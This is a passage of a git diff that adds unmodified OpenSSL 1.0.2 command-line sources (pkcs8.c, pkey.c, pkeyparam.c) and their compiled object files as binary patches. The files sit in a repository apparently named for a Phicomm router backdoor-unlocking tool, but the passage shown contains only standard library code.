+    if (!p8inf) {
+        BIO_printf(bio_err, "Error decrypting key\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (!(pkey = EVP_PKCS82PKEY(p8inf))) {
+        BIO_printf(bio_err, "Error converting key\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (p8inf->broken) {
+        BIO_printf(bio_err, "Warning: broken key encoding: ");
+        switch (p8inf->broken) {
+        case PKCS8_NO_OCTET:
+            BIO_printf(bio_err, "No Octet String in PrivateKey\n");
+            break;
+
+        case PKCS8_EMBEDDED_PARAM:
+            BIO_printf(bio_err, "DSA parameters included in PrivateKey\n");
+            break;
+
+        case PKCS8_NS_DB:
+            BIO_printf(bio_err, "DSA public key include in PrivateKey\n");
+            break;
+
+        case PKCS8_NEG_PRIVKEY:
+            BIO_printf(bio_err, "DSA private key value is negative\n");
+            break;
+
+        default:
+            BIO_printf(bio_err, "Unknown broken type\n");
+            break;
+        }
+    }
+
+    if (outformat == FORMAT_PEM)
+        PEM_write_bio_PrivateKey(out, pkey, NULL, NULL, 0, NULL, passout);
+    else if (outformat == FORMAT_ASN1)
+        i2d_PrivateKey_bio(out, pkey);
+    else {
+        BIO_printf(bio_err, "Bad format specified for key\n");
+        goto end;
+    }
+    ret = 0;
+
+ end:
+    X509_SIG_free(p8);
+    PKCS8_PRIV_KEY_INFO_free(p8inf);
+    EVP_PKEY_free(pkey);
+    BIO_free_all(out);
+    BIO_free(in);
+    if (passin)
+        OPENSSL_free(passin);
+    if (passout)
+        OPENSSL_free(passout);
+
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkcs8.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkcs8.o
new file mode 100644
index 0000000000000000000000000000000000000000..7a3ff1162bcc2c2b8504a3067cd4cc8c9a1c3251
GIT binary patch
literal 13768
zcmeI2e{>wxb;n1RgjN5LWZ9+$8#9mvWQ-QgO2V=+uq$cpk-e4{%d)Y-Ojf%id6Bfc
z?9NJdAaRH!nynCN0!bkB<Roo#pv^DR!YTX_A_~Uwp{Gs4>7k`fLK>Q~sKy0~6OtPB
z-aGHDu15R#qo;rNowGY{KJR<K@6LN~W@kn^8IJ5)R#BnJQlZ_fE$m6EX=Y%d9;9ke
ztJPL(@6~PoZRk+wV5mQIpuf*7yl39`ACEwL!kn(Usu3z?Vbb?m*c!9u#7z`vp6>Dm
zv4#~BEBW>2G_@J$-=u~@HEkBbsoA>8`6^9w6%#MigpKoI<1Foh(K?I>8*f0h8LP0Z
zuXMLHV%w_KxSehgf~t8am_;K3tmssk-fB*rt(!amy?y$VT2tNB9;lf!ZPZveM_q;r
zr>AD~hB<vtjX5)1V@}Q2O@3jSOs~-8+h9V*Q=b52PWOR^qUSox+JqL_?3Fg)QiUdM
zi%rB}nT0vZq_`2A%VpQG$o9WrUMV1K%o=BmpA=sD0nRjbLKu5`83<4J;j+G$lP@0e
z*QBQj69P^(#lJ&`a>*<N4SRy>i;pUT>Lzz9TiTQ@S1DW8D_g3SE$_n^l|7)9=5%L`
z2?wpuU0znOQ3@JyDNH_(MlejpZ!UE-XZmVjIjzHpurUw%NL~2#P~F3)=h_y$&B6g+
zdx&OD%vgRvModGK8}=rKnRVgU=EAT<=7Mg(Tzlv_I7V%*8J2k~)vkuxI;w4gS~Jxe
zu!iT$Tn*M>Wl_#yoa{IL8_pK@oD?}3vy{jGL%BjeazMl-;Cd70s?nTwe7ZRk@dYC@
za2XUsSUM3aVK(H%i_4%p*6u9Ag%7TE_%(0*bMX&gmL~3nOJLnpEnO-`z!0xs`)H4@
zJjPFqd2)vfap9afac2JA?}QFaclmaPjWcjXFbi)*F{j39FfxDrV{`rt$?vpaRmll1
zoT{7hFI;UFAFaC-#N{zk_;=cml=j`;&BD)J9dr|fi>6au+J%&1k!9p1zBmXqII607
zI4xkiL3?He9A{k^u2*=?+BfxvbBh=v*_&B-0kX|+7x_jC|7y&_PzjYBG3v4SF068)
zEB)-euy5+Dv$JICUg^6Fr_uC=lIdGZOkKyXEpdd<@YMOb$q3CR{iubaFy7DNxdy{c
zKYEeEuOcuHQCJll$S8C;bfmj*3OcQuJOrLFE6rx%G_`dXUPL~%`ooVt7u}3DK{O0q
zePw>NS$HW@aOYsI0a-<UEo1OwT6~*U3*{t+KumBKWU#LI_cZbM`VLa|&*2S$IkO(V
z;Wz$XUk&w$seNz(Qv+faE)+k7JB1I$+AHPqc9~pC40CykOv>a^{0g*y&pOTNflW<i
zz8-(fjPr73&8<OPkzcofV9<=S#n&;@a+fbUyt(m@bh~-M&7`Tx_sYeCD-4#F7&00L
z(d14-0Vm(nuX`3#J46@nCW(V*#QFT@$V|d_kjB?IBSu&*a9As5;n#RCh37Ax$Z)34
z-0IFN944F;`7PegpogVdy$7QqUERf&zuFtPH0t{h6`I)T(;WEWDKk5v=_=pihKb))
zI@h1PRE*BVZz`NCO7&&V`ngr5y((w9sEcI>69OyuiYU%6oHX-}56+$0NTIY)jvOvN
z@H<)!u$t>xLop9{aUR0c9r$8DwA1CFxR;dfJ!-;iac^4XRq4JL@m{v8@SnFI4c!qs
z8oD!Nz0fok(E3xusq}bCk0&$7?5uuOZiUt~W|VNWBdo_phSJ%jb8J+!1~S>f1;PGZ
zUO_T7n9h!BP3gSjR-ANZxLs>XrIU`G#ce!$BI95s9mh>BF`zZsqXTwAYs$oOxn#=S
zf`QhAJ6P$@#fEG>GaS#g>$j&fPBNX!9bKV~L)Nw~_VrlShWwK$eK0v<>!Ku6nY=@U
z+At^mw#99LVvgR}72dC>vwAeVZwpA>RKRnH#0xe$w&<B-*;vljbLo6Gj=hS*mDaFJ
z-Ile6MxLV7LeipN6o`&lWBHD0c;&(By3j}WcJ{T)qo$EwkmMon#uN;o6H6sx*~At-
zmDXV{Y{-i8g)C@3J}QI+2|J;8^@Sj@Y;4qq>CG)T;Jhvv=u11rz#iMl#bX&;@9JQY
zv{Fj37-{ISoQ~@!hBL3n)A^JGS&FqJrKp4nw2x=(xTEJ&c8Zo7B$>%3$6}7H58Edo
zY%G9_Rz^{3I9?xX)5ik-W*tUFo)A}p?n;a>^z^`8Wg`rKTbYP(HVc^y*^ZM;4bjAn
zr?Uw-y|M#ZXDoG%1B=#9>1<Wuxi`M3kxxCgLh_pH8&9Xk>?~Q+5p~28V)*nN9D8yw
z3C9d`=^k%51p}vt-NC@&i^2lNban_kF;18%*}0u$?O0*~k%u=hVbcJYREJ{O6zuHK
z2eRp5I6QFE!90yVJ9Molt@qM0>vOUg17~W~otV8iFP@c@OvOj?xWdZG@&hBuIQa`%
zS=GX<>tnHzysam5ddePxMKlJdn!NalWStWkfZFcP&K-JV{{XD8yuRJv;%{y;w&iKp
z_*9_T-`u*z#c)A|0{3=WJ$&$<Xm?M)2KN@T$l!*B3O&w4t>P2=wTk2Q6&qJAulXbR
zmAn_&CRd`pi}!=OYU@9@tfO|rgOwe%`b<?vZQ}#gq1xvAFACMRPb}Y4`=g4=$E$1q
zv7)E;^@@JjhLA)npw<oK2y8o$tg3|CULd_fv&^n-@2YJM)i#1J_;=LSchuI1o|kU$
zhOSC`XMSl59uu}MEtRFCUEEelqqCUdUL}oIIlg=;Bz^gOE4ANSqIU`1p)P8xrM>DU
z8Lbuk_ZO)(jb5!lo*O;<GNGqu5!QC4;5!+^>NSEN^ziEhzth7F!G}Ej2EkJvexu-H
z9v%|>q=)Yo{C*GLC-?&%-Y57&9)4Kx$2{B;{Lehx7W@eh9~S)E9)7prFM9a6;IDf4
zCk4mbL0%?kr&`<WS-J(m_j&l|1V7>7UljaH9_}80wf2&Se_iN{9{#xCo8Ushi+lXl
z+MOQ$S3>`Yhd(R$-+1^B1pmOpPYJ$NUYKZK(_R+*sE7Yp@G88RvEq(<wKnF_|CBV<
z+6fQ;rQi>Fcv0{#dH6ZOzvtoa3;wi+|4#6iJ-mX(y;>`J_;SH7^&Hn~!J9mMt>8C#
z_$7k(dHCgmKjY!}E)RbtvL3!w@Xvd=A^6Wce4F4EOD}P7UA>4#gMZxw`UZC0rr#P6
zn85LO%Uhxfen`Pb75un@Pb&ByD>%OEE0^af1%FM!f2H8>DENm8ei58k<?>mh;64Qp
zD0ruW->TquDfn>(pHlD#75pm-{<wmFTfv`F@b4@5D+>O;g0F$|yxhF_6ue!*BMN>*
z!S7M<FDv+8DEKo9{*r?KgMz=U;1zHkDK|bEJyZMRnm^Lnj9&(R1@Nl{zgqFD4Zm){
zuWk6%j$hmH%Wy*|#-JdBq6`W%D9)fjgCY$IH7GVfu>rR~iVaX~fMNp_8=%+##Re!g
zK(Q?p+d{D|Zn6~HLb0uGog7-op@ke;$f1QCTFIf699qet)s3a7R*Gt+s5Vzgv8@!_
zMp116ckHau7`&wzNTw}2o7Hko0yoy~NN-0dV)gFY)fYZs9SC(q!j{(2-D{=naceN6
zjih4<3!dW!lS5i~|9;Ee$2TKsD@Tt<IjuJu?&<4`Sg}OHij9oGN4$#3S@7fwvCvyK
zKAO?O2cs4|Yg+DWoPiT5cpBGwJN8)4aVL;UCa7b022MGHq=ol7)?hM~!1%!6sH4R)
z84F))j3=nNKh)FZW`u82G<um}iKj%$mb~zI)7hMMTU+yXtFL>vHJG)fIJ&?4ptU!A
z*y`@t)$2B3l2Jq?!=b<m9vG!Zv~&OA=mDWG4Hl*V!wQ28-|$fEjvYK(y2k>R0XIYU
zK~94gIMz74va&6l6t`(nK3X!6D92Gxp7`i%WyZxsEDVY3>W<0MPM9qkVH#wl$|4a+
zDzjJ`tS!jN9bfQR;sIO?1P~aB@L}%=l%BEO3`@IoycQf~EIw?-j}2RcvE+!jA@GYW
zTyC`>eBkXOl|77ypbmdZqjIa@c)QZc_-%qqAE|er6Eu8YCV$BXg&uvn;3IjC@i60`
zVSE?kX9Y)pd?u7W?tP^D+>Xyek~hHbJr?ZOgpcIz{h6C5KBh}fe|dy`^k2#NPUge?
z4>R7)^clg?XBFe)j0YJ%$$W4wWIoeOznbxfn4ahJB;!1v(~R$BK6qb+1@pvbY1!{D
z8Lwk}j`{F@tIz-nj&lS)(r1I<xWV5k$#tgZKHC}RKKPeHEVx+%AL-N2^xS8N=^L0n
zt<c}c^lO>EpwK_Y^!P4F=JTft{nJdpp6T&E2@8%J&maGog#|Yk!$<nRs?Zmi9^ZLL
z{W}W%3b>!Zg3b6&MCuy^_vUjW(_g~$oeKRR(_hN;@;TD${~pr^nf|woZ)6<rd$8b!
zpD#6n<8cMyBaf?&aeO}~`NayK%b1?~_!!4`M$%`i!Y9D=+-E!Eo0(5g;j^3Rxla${
zmouM!h0h&K&wb*I>&)jah0ong&wY+Feg*S6sqnd<>ABAg<5x1DhZR1LF+KPB6UINr
zeEwYF^CZ)ApTB0@$9$es_?%*T?(?^dU&VZ0QTV*Z^xWqcj9<-s-c<OUV|wm$p7Cp#
z&jp1~m3TklJ-=2m-pG6!1V=l5o?gQAJRhC$EzIW{g^!=<uVwnZjC21e^V!Gr7SnHK
ze2{VOGs=AUaeYIf{|?jlF#n%2-phDV;qw9G*D<|(MdTgl<>J+mcfM8$j`}F`S;siu
z`^oFuCdT(O?qj@<@#`2rz<4X;{fu`qj_=fEzXuikGlJuBH8K4kGW{XOA7%O=<4-V-
z_r|i{r<o6*-{+Yg?}4TMhfLqe_^V8RJ>x%TdY<RoOdn+W3ye22zI-|CK=ID|TETIA
z@SVQQ^HQegc{VY<!SuH<9%MYqe2y?a!uaispH%qV&p7_aj?8n0`S9_7nCXK||0vV*
z_538`cQE~nj2~tE6@~w6jJGiTFPIO{vqJo73&+2e=~oJl^M!vSlE-^3<M<3E`A)_^
z&UlpZ7~_`U-t&Esai0Gu^WphF$oK&B|2pGw#{ZJ}2N{2sao+DN^Wpve3*!mqbB=MF
z@ei3l?{_sm974fyXoHU&&j!K0=gTEbA7uK?OwZTVwF<q#I6vN-nGZkSIMd_b0%e}V
zOwZTJXBi)4`Y$sdp8r=F-^TP$Fdv@JcbT61JjL{U9G+)<i246W;qxlv{Cxiz^WpjY
z8`JZA-eP*5&jp3PY6T<*1=mA6eB?N<6x_QWE@t{5(_hB;cE-0dzJu{?jNiz3m~s5u
zvdrgJ#&2T$Ho?7l!v9xLL4J(szrc8s@vk!fAmiU)oUhw&F`qq5|4)qH#kdZ2EI7{i
zDHVV2#HbS+(ERXj(%l}DwX8i7^E>u&NAo9QPE7L;<Z_xno5mfK8-92(8&8jp+9{Bv
z(vIzif5~W~_gi9rD3$kTvhcq*S?2_VqM>~ZUPR&x)BlsAgA2a;5I@5u&!DKuzrV=_
z@tQ>L(*GOa90g0ntwiym4a&#yB?T0G=Y+B1vL^mtLDQ}lyb`v&1TdgX@%E4Ris<>j
zjmLWe^u%+P7uo;C;=WY2$^PXw2n|?omIARg>)i_8bMqqO<hC0cWu5DCBAzp>d$o8E
zgg@1b)+Fp77x6mOd6DBU+1*e<PjCDqBK{F66kBin2=H?A|0E796nqDR1*a1)VKQFw
za($z|c@2JpUYw7spnePPBZMO3(bGHk*xrsWRiHFra;$jA54$NB|3i`gJuDWh-uV9k
Dg}7rI

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkey.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkey.c
new file mode 100644
index 0000000..e848049
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkey.c
@@ -0,0 +1,251 @@
+/* apps/pkey.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2006
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+#include <stdio.h>
+#include <string.h>
+#include "apps.h"
+#include <openssl/pem.h>
+#include <openssl/err.h>
+#include <openssl/evp.h>
+
+#define PROG pkey_main
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    ENGINE *e = NULL;
+    char **args, *infile = NULL, *outfile = NULL;
+    char *passargin = NULL, *passargout = NULL;
+    BIO *in = NULL, *out = NULL;
+    const EVP_CIPHER *cipher = NULL;
+    int informat, outformat;
+    int pubin = 0, pubout = 0, pubtext = 0, text = 0, noout = 0;
+    EVP_PKEY *pkey = NULL;
+    char *passin = NULL, *passout = NULL;
+    int badarg = 0;
+#ifndef OPENSSL_NO_ENGINE
+    char *engine = NULL;
+#endif
+    int ret = 1;
+
+    if (bio_err == NULL)
+        bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    informat = FORMAT_PEM;
+    outformat = FORMAT_PEM;
+
+    ERR_load_crypto_strings();
+    OpenSSL_add_all_algorithms();
+    args = argv + 1;
+    while (!badarg && *args && *args[0] == '-') {
+        if (!strcmp(*args, "-inform")) {
+            if (args[1]) {
+                args++;
+                informat = str2fmt(*args);
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-outform")) {
+            if (args[1]) {
+                args++;
+                outformat = str2fmt(*args);
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-passin")) {
+            if (!args[1])
+                goto bad;
+            passargin = *(++args);
+        } else if (!strcmp(*args, "-passout")) {
+            if (!args[1])
+                goto bad;
+            passargout = *(++args);
+        }
+#ifndef OPENSSL_NO_ENGINE
+        else if (strcmp(*args, "-engine") == 0) {
+            if (!args[1])
+                goto bad;
+            engine = *(++args);
+        }
+#endif
+        else if (!strcmp(*args, "-in")) {
+            if (args[1]) {
+                args++;
+                infile = *args;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-out")) {
+            if (args[1]) {
+                args++;
+                outfile = *args;
+            } else
+                badarg = 1;
+        } else if (strcmp(*args, "-pubin") == 0) {
+            pubin = 1;
+            pubout = 1;
+            pubtext = 1;
+        } else if (strcmp(*args, "-pubout") == 0)
+            pubout = 1;
+        else if (strcmp(*args, "-text_pub") == 0) {
+            pubtext = 1;
+            text = 1;
+        } else if (strcmp(*args, "-text") == 0)
+            text = 1;
+        else if (strcmp(*args, "-noout") == 0)
+            noout = 1;
+        else {
+            cipher = EVP_get_cipherbyname(*args + 1);
+            if (!cipher) {
+                BIO_printf(bio_err, "Unknown cipher %s\n", *args + 1);
+                badarg = 1;
+            }
+        }
+        args++;
+    }
+
+    if (badarg) {
+ bad:
+        BIO_printf(bio_err, "Usage pkey [options]\n");
+        BIO_printf(bio_err, "where options are\n");
+        BIO_printf(bio_err, "-in file        input file\n");
+        BIO_printf(bio_err, "-inform X       input format (DER or PEM)\n");
+        BIO_printf(bio_err,
+                   "-passin arg     input file pass phrase source\n");
+        BIO_printf(bio_err, "-outform X      output format (DER or PEM)\n");
+        BIO_printf(bio_err, "-out file       output file\n");
+        BIO_printf(bio_err,
+                   "-passout arg    output file pass phrase source\n");
+#ifndef OPENSSL_NO_ENGINE
+        BIO_printf(bio_err,
+                   "-engine e       use engine e, possibly a hardware device.\n");
+#endif
+        return 1;
+    }
+#ifndef OPENSSL_NO_ENGINE
+    e = setup_engine(bio_err, engine, 0);
+#endif
+
+    if (!app_passwd(bio_err, passargin, passargout, &passin, &passout)) {
+        BIO_printf(bio_err, "Error getting passwords\n");
+        goto end;
+    }
+
+    if (outfile) {
+        if (!(out = BIO_new_file(outfile, "wb"))) {
+            BIO_printf(bio_err, "Can't open output file %s\n", outfile);
+            goto end;
+        }
+    } else {
+        out = BIO_new_fp(stdout, BIO_NOCLOSE);
+#ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+#endif
+    }
+
+    if (pubin)
+        pkey = load_pubkey(bio_err, infile, informat, 1,
+                           passin, e, "Public Key");
+    else
+        pkey = load_key(bio_err, infile, informat, 1, passin, e, "key");
+    if (!pkey)
+        goto end;
+
+    if (!noout) {
+        if (outformat == FORMAT_PEM) {
+            if (pubout)
+                PEM_write_bio_PUBKEY(out, pkey);
+            else
+                PEM_write_bio_PrivateKey(out, pkey, cipher,
+                                         NULL, 0, NULL, passout);
+        } else if (outformat == FORMAT_ASN1) {
+            if (pubout)
+                i2d_PUBKEY_bio(out, pkey);
+            else
+                i2d_PrivateKey_bio(out, pkey);
+        } else {
+            BIO_printf(bio_err, "Bad format specified for key\n");
+            goto end;
+        }
+
+    }
+
+    if (text) {
+        if (pubtext)
+            EVP_PKEY_print_public(out, pkey, 0, NULL);
+        else
+            EVP_PKEY_print_private(out, pkey, 0, NULL);
+    }
+
+    ret = 0;
+
+ end:
+    EVP_PKEY_free(pkey);
+    BIO_free_all(out);
+    BIO_free(in);
+    if (passin)
+        OPENSSL_free(passin);
+    if (passout)
+        OPENSSL_free(passout);
+
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkey.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkey.o
new file mode 100644
index 0000000000000000000000000000000000000000..b54a5af577b85c5b70570cf834d461108be1b419
GIT binary patch
literal 7624
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
N*MFLOSvWZD{{vH}ocsU)

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkeyparam.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkeyparam.c
new file mode 100644
index 0000000..a148a66
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkeyparam.c
@@ -0,0 +1,185 @@
+/* apps/pkeyparam.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2006
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
